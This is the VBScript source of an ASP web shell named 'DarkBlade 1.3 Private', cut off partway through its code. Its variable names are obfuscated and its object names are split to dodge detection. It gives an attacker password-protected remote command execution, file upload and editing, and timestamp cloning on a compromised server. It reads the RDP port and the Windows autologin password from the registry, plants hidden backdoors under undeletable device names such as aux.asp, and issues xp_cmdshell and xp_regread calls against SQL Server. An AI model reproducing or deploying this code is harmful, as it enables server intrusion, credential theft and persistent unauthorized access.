<%@ LANGUAGE='VBScript' CODEPAGE='65001'%><%Response.Buffer=TrueResponse.CharSet="utf-8"Server.ScriptTimeOut=300'-Config-'Private version, do not share it to anybody!'DarkBlade 1.3 by B100d5w0rd, msn:bloodsword@live.cn'Final version, no more update'Thanks to these hackers:Bin, Luyu, ShtConst pass="5A68946882EB7836AC818058F0B486"'tencentisapieceofshitConst nmpu=TrueConst aojzq=53Const yhhuu=FalseConst eqsmr="_"Const eqe="tgqn|mnlqb|mnu|qyoud|umjg|bgek|gtsi|axgr|ajto|sfgc|ahzlp|mld|kbqmz|pewgo|vyc|unv|ryo|mlos|avwuz|lqbub|ssi"Const woli="login"Const mso="GB2312"Const qrno="asp|asa|cer|cdx"Const szds="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"Const fyhwc=50Const owabm="zzzzzzzz.html"Const gjb=False''-Config-
Dim goaction,tgqn,mnu,qyoud,bgek,gtsi,pgfun,cezbg,qzmmm,fsuot,jjju,dnjte,fgqoi,yeke,bhcdb,ovc,dcsi,tdm,wwx,jvkhb,axgr,tfwxs,ayfiy,lemb,mnlqb,bfgs,ildc,jtpe,ypd,wvj,tpcq,pbff,gcb,dorg,conn,ajto,xdmm,zkdk,cbrvy,lnik,dni,sfgc,ahzlp,paunk,mld,kbqmz,axelp,pewgo,vyc,iksfh,cass,eyqzw,agc,fubdm,bfh,mt,unv,avwuz,ryo,mlos,ynhyo,xffss,cprkq,cpd,umjg,kqm,pqln,rybr,exfua,gej,nuzzl,bewvy,nixr,iwgp,coq,vkrju,ynkew,awua,ilavx,nil,nuser,npass,dxr,agp,lqbub,ssi,yqpew,orl,pdniwkqm="DarkBlade 1.3 Private"pqln="DarkBlade"rybr="Dark"&xkmgl&"BladePass"wqhx()ilavx=djssr()If ilavx Thenweere()Elsegoaction=request("goaction")End IfIf Not ilavx And goaction<>woli Then onqvt()If gjb And Trim(gzjrt("AUTH_"&blwc&"USER"))="" ThenResponse.Status="401 Unaut"&sban&"horized"Response.Addheader"WWW-AuT"&kyvp&"henticate","BASIC"If gzjrt("AUTH_"&blwc&"USER")=""Then Response.End()End IfSelect Case goactionCase wolikooc()Case"vbxjm"miu()Case"xyh"mhjs()Case"jmcvp"gkasm()Case"csyh"apve()Case"pufy"dvspl()Case"qsk"klihj()Case"dfk"yzwvx()Case"idqe"pai()Case"gxjn"xdzl()Case"nysli"rjixq()Case"Logout"tshz()Case"xwo"lbgc()Case"wnbxk","ich"afq()Case Elseafq()End SelectylzgSub wqhx()If Not yhhuu Then On Error Resume Nextovc=Timer()Dim vwtsu,cosst,yqn,cbtp,shcq,owlr,azeb,mqdservurl=gzjrt("URL")Set cezbg=qvjto("MS"&sdif&"XML2.XMLH"&tac&"TTP")Set qzmmm=qvjto("WS"&jqx&"cript.Sh"&ndhkc&"ell")Set fsuot=qvjto("Scri"&nfbne&"pting.FileSystemOb"&yig&"ject")Set jjju=qvjto("She"&gmg&"ll.App"&jpyz&"lication")If Not IsObject(qzmmm)Then Set qzmmm=qvjto("WS"&jqx&"cript.She"&gmg&"ll.1")If Not IsObject(jjju)Then Set jjju=qvjto("She"&gmg&"ll.App"&jpyz&"lication.1")Set fgqoi=new RegExpfgqoi.Global=Truefgqoi.IgnoreCase=Truefgqoi.MultiLine=Truepgfun=gzjrt("SERVER_NAME")yeke=gzjrt("PATH_INFO")bhcdb=Lcase(niih(yeke,"/"))tdm=zuy(".")wwx=zuy("/")bfgs=1tfwxs=1End SubSub weere()For Each cosst In request.queryStringexecute cosst&"=request.queryString("""&cosst&""")"NextFor Each vwtsu In request.Formexecute vwtsu&"=request.form("""&vwtsu&""")"NextIf InStr(gzjrt("CONTENT_TYPE"),"multipart/form-data")=1 ThenSet agp=new upload_5xsoftFor Each yqn In agp.tfhdexecute yqn&"=agp.tfhd("""&yqn&""")"NextEnd Ifmqd=Split(eqe,"|")For Each azeb In mqdexecute""&azeb&"=srhx("&azeb&")"NextIf Right(tgqn,1)="\"And Len(tgqn)>3 Then tgqn=Left(tgqn,Len(tgqn)-1)End SubSub ylzg()If Not yhhuu Then On Error Resume NextDim swzcezbg.abortSet cezbg=NothingSet qzmmm=NothingSet fsuot=NothingSet jjju=NothingSet fgqoi=Nothingdcsi=timer()swz=dcsi-ovcecho"<br></div>"brsr"100%"echo"<trcode-snippet__string">"head"">"echo"<td>"dmj jvkhbswz=FormatNumber(swz,5)If Left(swz,1)="."Then swz="0"&swzdmj"<br>"echo"<div align=right>Processed in :"&swz&"seconds</div></td></tr></table></body></html>"Response.End()End SubSub kooc()If Not yhhuu Then On Error Resume Nextcpd=request("cpd")If cpd<>""Thencpd=czgns(cpd)If czgns(cpd)=pass ThenResponse.Cookies(rybr)=cpdResponse.Redirect(yeke)Elseixqai"Fuck you,get out!"End IfEnd Ifbdyaf"Login"echo"<center><br>"ekgsj Falseecho"<b>Password : </b>"evybt"password","cpd","","30",""echo" "regaf"Get In"echo"</center></form>"End SubSub dvspl()If Not yhhuu Then On Error Resume NextDim i,zohr,bwyd,ktggg,qcey,ldddo,bkhqb,ald,zakic,ryektggg="SystemRo"&sbbaf&"ot|WinD"&abx&"ir|ComS"&aerq&"pec|TEMP|TMP|NUMBE"&tns&"R_OF_PROCESSORS|OS|Os2"&pwdh&"LibPath|Path|PATH"&nfetl&"EXT|PROCESSOR_A"&vef&"RCHITECTURE|"&_"PROCESSOR_IDENTI"&aozhh&"fIER|PROCES"&sboq&"SOR_LEVEL|PROC"&nfrfc&"ESSOR_REVISION"bwyd=Split(ktggg,"|")execute "Set zohr=qzmmm.En"&klu&"vironment(""SYSTEM"")"qcey=gzjrt("NUMBE"&tns&"R_OF_PROCESSORS")If IsNull(qcey)Or qcey=""Thenqcey=zohr("NUMBE"&tns&"R_OF_PROCESSORS")End Ifbkhqb=gzjrt("OS")If IsNull(bkhqb)Or bkhqb=""Thenbkhqb=zohr("OS")bkhqb=bkhqb&"(probably Windows 2003)"End Ifldddo=zohr("PROCESSOR_IDENTI"&aozhh&"fIER")bdyaf"Server Infomation"brsr"100%"kbpziecho"<td colspan=""2""align=""center"">"echo"<b>Server parameters:</b>"echo"</td>"dohosfdlz 0doTd"Server name:",""doTd pgfun,""dohosfdlz 1doTd"Server IP:",""doTd gzjrt("LOCAL_ADDR"),""dohosfdlz 0doTd"Server port:",""doTd gzjrt("SERVER_PORT"),""dohosfdlz 1doTd"Server Me"&tkz&"mory",""execute "doTd bqj(jjju.GetSystemInfor"&mujpk&"mation(""PhysicalMemoryInstalled"")),"""""dohosfdlz 0doTd"Server time",""doTd Now,""dohosfdlz 1doTd"Server soft",""doTd gzjrt("SERVER_SOFTWARE"),""dohosfdlz 0doTd"Script timeout",""doTd Server.ScriptTimeout,""dohosfdlz 1doTd"Number of cpus",""doTd qcey,""dohosfdlz 0doTd"Info of cpus",""doTd ldddo,""dohosfdlz 1doTd"Server OS",""doTd bkhqb,""dohosfdlz 0doTd"Server script engine",""doTd ScriptEngine&"/"&ScriptEngineMajorVersion&"."&ScriptEngineMinorVersion&"."&ScriptEngineBuildVersion,""dohosfdlz 1doTd"File full path",""doTd gzjrt("PATH_TRANSLATED"),""dohostfwxs=0For i=0 To UBound(bwyd)fdlz tfwxsdoTd bwyd(i)&":",""execute "doTd qzmmm.ExpandEnvironm"&jomee&"entStrings(""%""&bwyd(i)&""%""),"""""dohosnvzmNextuxpnntcc(Err)echo"<br>"Set zohr=NothingDim gvbwbrsr"100%"kbpziecho"<td colspan=""6""align=""center"">"echo"<b>Info of disks</b>"echo"</td>"dohosfdlz 0doTd"Driver letter",""doTd"Type",""doTd"Label",""doTd"File system",""doTd"Space left",""doTd"Total space",""dohostfwxs=1For Each gvbw In fsuot.DrivesDim sxiow,nmc,fwv,dbjys,wku,dqqsxiow=gvbw.DriveLetterIf Lcase(sxiow)<>"a"Thennmc=tpy(gvbw.DriveType)fwv=gvbw.VolumeNamedbjys=gvbw.Filesystemwku=bqj(gvbw.FreeSpace)execute "dqq=bqj(gvbw.TotalSiz"&btf&"e)"fdlz tfwxsdoTd sxiow,""doTd nmc,""doTd fwv,""doTd dbjys,""doTd wku,""doTd dqq,""dohosEnd Ifsxiow=""nmc=""fwv=""dbjys=""wku=""dqq=""nvzmNextuxpnntcc(Err)Set gvbw=NothingDim jwysSet jwys=fsuot.GetFolder(wwx)echo"<br>"brsr"100%"kbpziecho"<td colspan=""2""align=""center"">"echo"<b>Info of site:</b>"echo"</td>"dohosfdlz 0doTd"Ph"&zvt&"ysical path:",""doTd wwx,""dohosfdlz 1doTd"Current size:",""doTd bqj(jwys.Size),""dohosfdlz 0doTd"File count:",""doTd jwys.Files.Count,""dohosfdlz 1doTd"Folder count:",""doTd jwys.SubFolders.Count,""dohosuxpnntcc(Err)dmj"<br>"Dim vnzn,bur,xiokwDim xtue,imbi,emchd,lqbucald="HKEY_LOCAL_MACHINE\SYSTEM\CurrentC"&vetz&"ontrolSet\Control\Ter"&vdsmd&"minal Server\WinStat"&yxndg&"ions\RDP"&aeckz&"-Tcp\"zakic="PortNumber"rye=dybd(ald&zakic)If rye=""Then rye="Can't get Ter"&vdsmd&"minal port.<br/>"vnzn="HK"&xkm&"LM\SOF"&qiso&"TWARE\Microsoft\Windo"&lisdj&"ws NT\Current"&plxoc&"Version\Winlo"&vtnrt&"gon\"imbi="AutoA"&rsop&"dminLogon"bur="Default"&dhwdj&"UserName"xiokw="Default"&xcxy&"Password"xtue=dybd(vnzn&imbi)If xtue=0 Thenemchd="Autologin isn't enabled"Elseemchd=dybd(vnzn&bur)End IfIf xtue=0 Thenlqbuc="Autologin isn't enabled"Elselqbuc=dybd(vnzn&xiokw)End Ifbrsr"100%"kbpziecho"<td colspan=""2""align=""center"">"echo"<b>Info of Ter"&vdsmd&"minal port&Autologin</b>"echo"</td>"dohosfdlz 0doTd"Ter"&vdsmd&"minal port:",""doTd rye,""dohosfdlz 1doTd"Autologin account:",""doTd emchd,""dohosfdlz 0doTd"Autologin password:",""doTd lqbuc,""dohosuxpnecho"</ol>"ntcc(Err)End SubSub miu()Dim i,pgfin,qezpg,enmamqezpg="MSW"&esndu&"C.AdRotator,MSW"&esndu&"C.Br"&opyi&"owserType,MSW"&esndu&"C.NextLink,MSW"&esndu&"C.TOOLS,MSW"&esndu&"C.Status,MSW"&esndu&"C.Counters,IISSam"&quu&"ple.Co"&wpjc&"ntentRotator,IISSam"&quu&"ple.Page"&jby&"Counter,MSW"&esndu&"C.PermissionChec"&qwsd&"ker,Adod"&pmu&"b.Co"&zfd&"nnection,SoftArtis"&wpx&"ans.File"&oomr&"Up,SoftArtis"&wpx&"ans.Fil"&arsr&"eManager,LyfUpload.UploadFile,Persi"&arqt&"ts.Upload.1,W3.Upload,JMail.SmtpMail,CDONTS.NewMail,Persi"&arqt&"ts.Mailsender,SMTPsvg.Mailer,DkQmail.Qmail,Geocel.Mailer,IISmail.Iismail.1,SmtpMail.SmtpMail.1,SoftArtis"&wpx&"ans.ImageGen,W3Image.Image,Scri"&nfbne&"pting.FileSystemOb"&yig&"ject,Adod"&pmu&"b.St"&fpxzu&"ream,She"&gmg&"ll.App"&jpyz&"lication,She"&gmg&"ll.App"&jpyz&"lication.1,WS"&jqx&"cript.Sh"&ndhkc&"ell,WS"&jqx&"cript.She"&gmg&"ll.1,WS"&jqx&"cript.Network,hzhost.modules"enmam="Ad Rotator,Browser info,NextLink,,,Counters,Content rotator,,Permission checker,ADODB connection,SA-FileUp,SoftArtisans FileManager,LyfUpload,ASPUpload,Dimac upload,Dimac JMail,CDONTS SMTP mail,ASPemail,ASPmail,dkQmail,Geocel mail,IISmail,SmtpMail,SoftArtisans ImageGen,Dimac W3Image,FSO,Stream ,,,,,,Hzhost module"aryObjectList=Split(qezpg,",")aryDscList=Split(enmam,",")bdyaf"Server Object Probe"echo"Check for other ObjectId or ClassId.<br>"ekgsj Trueevybt"text","axgr",axgr,50,""echo" "regaf"Check"fhqovIf axgr<>""ThennybqmCall pka(axgr,"")echo"</ul>"End Ifecho"<hr/>"echo"<ulcode-snippet__string">"info""><li><u>Object name</u>Status and more</li>"For i=0 To UBound(aryDscList)Call pka(aryObjectList(i),aryDscList(i))Nextecho"</ul><hr/>"End SubSub mhjs()Dim tguct,jjxv,ebxtsbdyaf"Users and Groups Imformation"Set ebxts=getObj("WinNT://.")ebxts.Filter=Array("User")xeg"User",Falsebrsr"100%"For Each tguct in ebxtskbpziecho"<td colSpan=""2""align=""center""><b>"&tguct.Name&"</b></td>"dohospzi(tguct.Name)Nextuxpnecho"</span><br>"ntcc(Err)xeg"UserGroup",Falseebxts.Filter=Array("Group")brsr"100%"tfwxs=1For Each jjxv in ebxtsfdlz tfwxsdoTd jjxv.Name,""doTd jjxv.Description,""dohosnvzmNextuxpnecho"</span>"ntcc(Err)End SubSub gkasm()If Not yhhuu Then On Error Resume NextDim ugjy,eoys,leys,yennmIf ayfiy<>""Then Session(ayfiy)=lembbdyaf"Server-Client Information"xeg"ServerVariables",Truebrsr"100%"tfwxs=1For Each leys In Request.ServerVariablesfdlz tfwxsssgey leysdoTd gzjrt(leys),""dohosnvzmNextuxpndmj"</span><br>"xeg"Application",Truebrsr"100%"tfwxs=1For Each leys In Application.Contentsfdlz tfwxsssgey leysdoTd ihz(Application(leys)),""dohosnvzmNextuxpndmj"</span><br>"xeg"Session",Trueecho"<br>(ID"&Session.SessionId&")"brsr"100%"tfwxs=1For Each leys In Session.Contentsyennm=Session(leys)fdlz tfwxsssgey leysdoTd ihz(yennm),""dohosnvzmNextfdlz tfwxsekgsj Falsekrxrz"Set Session","20%"echo"<td width=""80%""> Key :"evybt"text","ayfiy","",30,""echo"Value :"evybt"text","lemb","",30,""echo"</td>"fhqovdohosuxpndmj"</span><br>"xeg"Cookies",Truebrsr"100%"tfwxs=1For Each leys In Request.CookiesIf Request.Cookies(leys).HasKeys ThenFor Each ugjy In Request.Cookies(leys)fdlz tfwxsssgey leys&"("&ugjy&")"doTd ihz(Request.Cookies(leys)(ugjy)),""dohosnvzmNextElsefdlz tfwxsssgey leysdoTd ihz(Request.Cookies(leys)),""dohosnvzmEnd IfNextuxpnecho"</span>"ntcc(Err)End SubSub apve()Dim cvc,dcswzIf Not yhhuu Then On Error Resume Nextbdyaf("WS"&jqx&"cript.Sh"&ndhkc&"ell Execute")If mnlqb<>""ThenIf InStr(Lcase(mnlqb),"cmd.exe")>0 And InStr(mnu,"/c ")<1 Thendcswz=mnlqb&" /c "&mnuElsedcswz=mnlqb&" "&mnuEnd IfIf coq=1 Thenexecute "cvc=qzmmm.Ex"&qfno&"ec(dcswz).StdOut.ReadAl"&cnub&"l()"Elseexecute "qzmmm.R"&loq&"un dcswz,0,False"End Ifntcc(Err)Elsemnlqb="cmd.exe"End Ifbrsr"100%"ekgsj Truefdlz 1doTd"Path","20%"qaj"text","mnlqb",mnlqb,"60%","",""echo"<td>"rwg"coq",1," View result ","checked"regaf"Run"echo"</td>"dohosfdlz 0doTd"Parameters",""qaj"text","mnu",mnu,"","","2"dohosfhqovuxpnecho"<hr><b>Result:</b><br><spancode-snippet__string">"alt1Span"">"&ihz(cvc)&"</span>"ntcc(Err)End SubSub afq()If Not yhhuu Then On Error Resume NextIf tgqn=""Then tgqn=gtsiIf tgqn=""Then tgqn=tdmIf goaction<>"wnbxk"Then goaction="ich"If ildc="down"Thenjeulz()Response.End()End IfIf goaction="ich"Thenwvj="fso"bdyaf("FSO File Explorer")Elsewvj="sa"bdyaf("APP File Explorer")End IfSelect Case ildcCase"flu","pusyg"ihmx()tgqn=qjr(tgqn,"\",False)Case"xwm"xwm()Case"save","dut"xek()tgqn=qjr(tgqn,"\",False)Case"bltvq"vwgpk()Case"uiena","abkw"uiena()Case"chf","xxicv"qjrhm()tgqn=qjr(tgqn,"\",False)Case"xhs","ugxl","lsyra","vqqpu"uyz()tgqn=qjr(tgqn,"\",False)Case"iqg"nfe()Case"gwm"lvdga()tgqn=qjr(tgqn,"\",False)Case"qpsx"escxl()End SelectIf Len(tgqn)<3 Then tgqn=tgqn&"\"quhhx()End SubSub quhhx()Dim theFolder,pfx,mojl,eoj,tghd,emd,qqq,volhIf Not yhhuu Then On Error Resume NextIf wvj="fso"ThenSet theFolder=fsuot.GetFolder(tgqn)eoj=fsuot.GetParentFolderName(tgqn)Elseexecute "Set theFolder=jjju.NameS"&pgvq&"pace(tgqn)"fhmak Erreoj=qjr(tgqn,"\",False)If InStr(eoj,"\")<1 Theneoj=eoj&"\"End IfEnd Ifvolh=tgqnIf Right(volh,1)<>"\"Then volh=volh&"\"rlb"volh",volhekgsj Trueecho"<b>Current Path :</b>"evybt"text","tgqn",tgqn,120,""dmj""xgbfu"","170px","onchange=""javascript:if(this.value!=''){regaf('"&goaction&"','',this.value);}"""jjin"","Drivers/Comm folders"jjin ihz(zuy(".")),"."jjin ihz(zuy("/")),"/"jjin"","-"If Lcase(wvj)="fso"ThenFor Each drive In fsuot.Drivesexecute "jjin drive.DriveLett"&imk&"er&"":\"",drive.DriveLett"&imk&"er&"":\"""Nextjjin"","-"End Ifjjin"C:\Program Files","C:\Program Files"jjin"C:\Program Files\RhinoSoft.com","RhinoSoft.com"jjin"C:\Program Files\Ser"&xlv&"v-U","Ser"&xlv&"v-U"jjin"C:\Program Files\Rad"&ocxn&"min","Rad"&ocxn&"min"jjin"C:\Program Files\Microsoft SQL Server","Mssql"jjin"C:\Program Files\Mysql","Mysql"jjin"","-"jjin"C:\Documents and Settings\All Users","All Users"jjin"C:\Documents and Settings\All Users\Documents","Documents"jjin"C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere","PcAnywhere"jjin"C:\Documents and Settings\All Users\Start Menu\Programs","Start Menu->Programs"jjin"","-"jjin"D:\Program Files","D:\Program Files"jjin"D:\Ser"&xlv&"v-U","D:\Ser"&xlv&"v-U"jjin"D:\Rad"&ocxn&"min","D:\Rad"&ocxn&"min"jjin"D:\Mysql","D:\Mysql"rkfuregaf"Go"fhqovdmj"<br><form method=""post"" id=""upform""action="""&yeke&"""enctype=""multipart/form-data"">"rlb"ildc","bltvq"rlb"tgqn",tgqnbrsr"60%"fdlz 1qaj"file","upfile","","30%","",""doTd"Save As :","15%"qaj"text","lqbub","","30%","",""qaj"button",""," Upload ","20%","onClick=""javascript:regaf('"&goaction&"','bltvq','')""",""dohosfhqovIf wvj="fso"Thenfdlz 0ekgsj Truerlb"tgqn",tgqnrlb"ildc","xwm"qaj"text","pbff","","","",""echo"<td colspan='2'>"evybt"radio","gcb","file","","checked"echo"File"evybt"radio","gcb","folder","",""echo"Folder</td>"krxrz"New one",""'qaj"button","makedoor","Make backdoor","","onClick=""javascript:regaf('"&goaction&"','qpsx','"&iij(tgqn)&"')""",""fhqovdohosEnd Ifecho"</table><hr>"If wvj="fso"ThenIf Not fsuot.FolderExists(tgqn)Thenixqai tgqn&" Folder dosen't exists or access denied!"ylzgEnd IfEnd Ifxeg"Folders",Falsebrsr"100%"kbpzidoTd"<b>Folder name</b>",""doTd"<b>Size</b>",""doTd"<b>Last modIfied</b>",""echo"<td><b>Action</b>"If wvj="fso"Then echo" - "jeikq goaction,"qpsx",iij(tgqn),"Make a hidden backdoor here",""End Ifecho"</td>"dohosfdlz 0echo"<td colspan=""4"">"jeikq goaction,"",iij(eoj),"Parent Directory",""echo"</td>"dohostfwxs=1If wvj="fso"ThenFor Each objX In theFolder.SubFoldersqqq=objX.DateLastModIfiedfdlz tfwxsecho"<td>"jeikq goaction,"",objX.Name,objX.Name,""echo"</td>"doTd ihz("<dir>"),""doTd qqq,""echo"<td>"jeikq goaction,"lsyra",objX.Name,"Copy"," -"jeikq goaction,"vqqpu",objX.Name,"Move"," -"jeikq goaction,"xxicv",objX.Name,"Rename"," -"jeikq "xwo","msqiu",objX.Name,"Package"," -"jeikq goaction,"pusyg",objX.Name,"Delete",""dmj"</td>"dohosnvzmNextElseFor Each objX In theFolder.ItemsIf objX.IsFolder Thenqqq=theFolder.GetDetailsOf(objX,3)fdlz tfwxsecho"<td>"jeikq goaction,"",objX.Name,objX.Name,""echo"</td>"doTd ihz("<dir>"),""doTd qqq,""echo"<td>"jeikq goaction,"xxicv",objX.Name,"Rename"," -"jeikq "xwo","vgm",objX.Name,"Package",""dmj"</td>"dohosnvzmEnd IfNextEnd Ifuxpndmj"</span><br>"xeg"Files",Falsebrsr"100%"echo"<b>"kbpzidoTd"<b>File name</b>",""doTd"<b>Size</b>",""doTd"<b>Last modIfied</b>",""doTd"<b>Action</b>",""dohosecho"</b>"tfwxs=0If wvj="fso"ThenFor Each objX In theFolder.Filestghd=bqj(objX.Size)qqq=objX.DateLastModIfiedIf Lcase(Left(objX.Path,Len(wwx)))<>Lcase(wwx) Thenpfx=""Elsepfx=Replace(Replace(myzv(Mid(objX.Path,Len(wwx)+1)),"%2E","."),"+","%20")End Iffdlz tfwxsIf pfx=""ThendoTd objX.Name,""ElsedoTd"<a href='"&Replace(pfx,"%5C","/")&"' target=_blank>"&objX.Name&"</a>",""End IfdoTd tghd,""doTd qqq,""echo"<td>"jeikq goaction,"uiena",objX.Name,"Edit"," -"jeikq goaction,"xhs",objX.Name,"Copy"," -"jeikq goaction,"ugxl",objX.Name,"Move"," -"jeikq goaction,"chf",objX.Name,"Rename"," -"jeikq goaction,"down",objX.Name,"Down"," -"jeikq goaction,"iqg",objX.Name,"Attributes"," -"qynt "lnv",objX.Name,"","","","Database"," -"jeikq goaction,"flu",objX.Name,"Delete",""dmj"</td>"dohosnvzmNextElseFor Each objX In theFolder.ItemsIf Not objX.IsFolder ThenDim meamdmeamd=niih(objX.Path,"\")emd=iij(objX.Path)tghd=theFolder.GetDetailsOf(objX,1)qqq=theFolder.GetDetailsOf(objX,3)If Lcase(Left(objX.Path,Len(wwx)))<>Lcase(wwx) Thenpfx=""Elsepfx=Replace(Replace(myzv(Mid(objX.Path,Len(wwx)+1)),"%2E","."),"+","%20")End Iffdlz tfwxsIf pfx=""ThendoTd niih(objX.Path,"\"),""ElsedoTd"<a href='"&Replace(pfx,"%5C","/")&"' target=_blank>"& niih(objX.Path,"\")&"</a>",""End IfdoTd tghd,""doTd qqq,""echo"<td>"jeikq goaction,"uiena",meamd,"Edit"," -"jeikq goaction,"chf",meamd,"Rename"," -"jeikq goaction,"down",meamd,"Down"," -"jeikq goaction,"iqg",meamd,"Attributes"," -"qynt "lnv",meamd,"","","","Database",""dmj"</td>"dohosnvzmEnd IfNextEnd Ifuxpnecho"</span>"ntcc(Err)End SubSub nfe()Dim nakic,elf,tio,owan,cgjaz,eowyt,aokth,qramoIf Not yhhuu Then On Error Resume NextIf IsObject(fsuot)ThenSet nakic=fsuot.GetFile(tgqn)End IfIf IsObject(jjju)Thenaokth=qjr(tgqn,"\",False)tio=niih(tgqn,"\")execute "Set eowyt=jjju.NameSp"&lgjlr&"ace(aokth)"Set elf=eowyt.ParseName(tio)End Ifecho"<center>"brsr"60%"ekgsj Truerlb"ildc","gwm"rlb"tgqn",tgqnfdlz 1krxrz"Set / Clone",""doTd tgqn,""dohosfdlz 0doTd"Attributes",""If IsObject(fsuot)Thencgjaz=nakic.Attributesowan="<input type=checkbox name=awua value=4 class='input' {$system}>system "owan=owan&"<input type=checkbox name=awua value=2 class='input' {$hidden}>hide "owan=owan&"<input type=checkbox name=awua value=1 class='input' {$readonly}>readonly "owan=owan&"<input type=checkbox name=awua value=32 class='input' {$archive}>save "If cgjaz>=128 Then cgjaz=cgjaz-128If cgjaz>=64 Then cgjaz=cgjaz-64If cgjaz>=32 Thencgjaz=cgjaz-32owan=Replace(owan,"{$archive}","checked")End IfIf cgjaz>=16 Then cgjaz=cgjaz-16If cgjaz>=8 Then cgjaz=cgjaz-8If cgjaz>=4 Thencgjaz=cgjaz-4owan=Replace(owan,"{$system}","checked")End IfIf cgjaz>=2 Thencgjaz=cgjaz-2owan=Replace(owan,"{$hidden}","checked")End IfIf cgjaz>=1 Thencgjaz=cgjaz-1owan=Replace(owan,"{$readonly}","checked")End IfdoTd owan,""ElsedoTd"FSO object disabled,can't get/Set attributes -_-~!",""End IfdohosIf IsObject(jjju)Thenfdlz 1doTd"Date created",""doTd eowyt.GetDetailsOf(elf,4),""dohosfdlz 0doTd"Date last modIfied",""qaj"text","vkrju",eowyt.GetDetailsOf(elf,3),"","",""dohosfdlz 1doTd"Date last accessed",""doTd eowyt.GetDetailsOf(elf,5),""dohosElsefdlz 1doTd"Date created",""execute "doTd nakic.Date"&cqq&"Created,"""""dohosfdlz 0doTd"Date last modIfied",""doTd nakic.DateLastModIfied,""dohosfdlz 1doTd"Date last accessed",""doTd nakic.DateLastAccessed,""dohosEnd Iffdlz 0If IsObject(jjju)ThendoTd"Clone time ",""echo"<td>"xgbfu"ynkew","100%",""jjin "","Do not clone"For Each objX In eowyt.ItemsIf Not objX.IsFolder Thenqramo=niih(objX.Path,"\")jjin qramo,eowyt.GetDetailsOf(eowyt.ParseName(qramo),3)&" --- "&qramoEnd IfNextElseecho"<td colspan=2>App object disabled,can't modIfy time -_-~!</td>"End Ifuxpnfhqovylzg()End SubSub lvdga()If Not yhhuu Then On Error Resume NextDim nldd,nakic,aokth,tio,eowyt,elfIf IsObject(fsuot)ThenSet nakic=fsuot.GetFile(tgqn)End IfIf IsObject(jjju)Thenaokth=qjr(tgqn,"\",False)tio=niih(tgqn,"\")execute "Set eowyt=jjju.NameSp"&lgjlr&"ace(aokth)"Set elf=eowyt.ParseName(tio)End IfIf awua<>""Thenawua=Split(Replace(awua," ",""),",")For i=0 To UBound(awua)nldd=nldd+CInt(awua(i))Nextnakic.Attributes=nlddIf Err Thenntcc(Err)Elseixqai"Attributes modIfied"End IfEnd IfIf ynkew=""ThenIf vkrju<>"" And IsDate(vkrju)Thenelf.ModIfyDate=vkrjuIf Err Thenntcc(Err)Elseixqai"Time modIfied"End IfEnd IfElseelf.ModIfyDate=eowyt.GetDetailsOf(eowyt.ParseName(ynkew),3)If Err Thenntcc(Err)Elseixqai"Time modIfied"End IfEnd IfEnd SubSub escxl()If fileName<>""ThenDim lfy,enylfy="\\.\"&tgqn&"\"&fileNameIf pdniw=1 Thenexecute "Call fsuot.MoveF"&bxwy&"ile(gzjrt(""PATH_TRANSLATED""),lfy)"Set eny=fsuot.GetFile(lfy)eny.Attributes=6Response.Redirect(fileName)Elsepbsto lfy,tpcqSet eny=fsuot.GetFile(lfy)eny.Attributes=6End IfIf Err Thenntcc(err)Elseixqai("Backdoor established,have fun.")End IfExit SubEnd Ifekgsj Truebrsr"100%"rlb"ildc","qpsx"dmj"<b>Make hidden backdoor</b><br>"brsr"100%"fdlz 1doTd"Path","20%"qaj"text","tgqn",tgqn,"60%","",""krxrz"Save","20%"dohosfdlz 0doTd"Content",""pdlc "tpcq","",10echo"<td>"rwg"pdniw",1,"Move myself there","onclick='javascript:document.getElementById(""tpcq"").disabled=this.checked'"echo"</td>"dohosfdlz 1echo"<td>"xgbfu"fileName","100%",""jjin"aux.asp","aux.asp"jjin"con.asp","con.asp"jjin"com1.asp","com1.asp"jjin"com2.asp","com2.asp"jjin"nul.asp","nul.asp"jjin"prn.asp","prn.asp"rkfuecho"</td>"dmj"<td colspan='2'>Cannot del,cannot open in ordinary way,this will drive the web administrator madness :)</td>"dohosuxpnfhqovylzgEnd SubSub klihj()If Not yhhuu Then On Error Resume NextIf qyoud=""Then qyoud=Request.Cookies(pqln&"qyoud")sei()If qyoud<>""ThenSelect Case ildcCase"kej"kej()Case"drmct"drmct()Case"lbr"lbr()Case"oxxk","lug"ihk()Case Elselnv()End SelectEnd IfaspmylzgEnd SubSub sei()Dim rs,kvmbj,urmqs,budsIf Not yhhuu Then On Error Resume Nextbdyaf("Database Operation")ekgsj Truedmj"Connect String : "evybt"text","qyoud",qyoud,160,""echo" "regaf"OK"fhqovxeg"GetConnectString",Truebrsr"100%"fdlz 1doTd"SqlOleDb","10%"dmj"<td style=""width:80%"">Server:"evybt"text","MsServer","127.0.0.1","15",""echo" Username:"evybt"text","MsUser","sa","10",""echo" Password:"evybt"text","MsPass","","10",""echo" DataBase:"evybt"text","DBPath","","10",""echo"</td>"qaj"button","","Generate","10%","onClick=""javascript:tbcm(MsServer.value,MsUser.value,MsPass.value,DBPath.value)""",""dohosfdlz 0doTd"Jet",""dmj"<td>DB path:"evybt"text","accdbpath",tdm&"\","82",""echo"</td>"qaj"button","","Generate","10%","onClick=""javascript:ehjqw(accdbpath.value)""",""dohosuxpnecho"</span><hr>"If Err Then Err.clearIf qyoud<>""Thenjvj qyoudResponse.Cookies(pqln&"qyoud")=qyoudSet rs=qvjto("Adod"&pmu&"b.R"&fqkc&"ecordSet")rs.Open "select @@version,db_name()",conn,1,1If Err Thendorg="access"Err.clearSet rs=NothingSet rs=qvjto("Adod"&pmu&"b.R"&fqkc&"ecordSet")rs.Open "select cstr('access')",conn,1,1If Err Thendorg="others"Err.clearEnd Ifrs.CloseSet rs=NothingElseorl=rs(0)cbrvy=rs(1)rs.closedorg="mssql"%><script language=vbscript>Function iung(path)Dim ttsx,bgek,yfwwttsx=qjr(path,"\",True)path=Mid(path,Len(ttsx)+2)yfww=niih(path,"\")bgek=qjr(path,"\",False)iung=Array(ttsx,bgek,yfww)End FunctionFunction wsrj(zeok)form2.umjg.value="exec ma"&tifz&"ster..xp_cmdshell '"&zeok&"'"End FunctionFunction riws(bgek)Dim mcewmcew=iung(bgek)form2.umjg.value="exec ma"&tifz&"ster..xp_regread '"&mcew(0)&"','"&mcew(1)&"','"&mcew(2)&"'"End FunctionFunction zwrvw(tjaoy)form2.umjg.value="exec ma"&tifz&"ster..xp_dirtree '"&tjaoy&"',1,1"End FunctionFunction xdla(qeq,oaow,waa)If waa=2 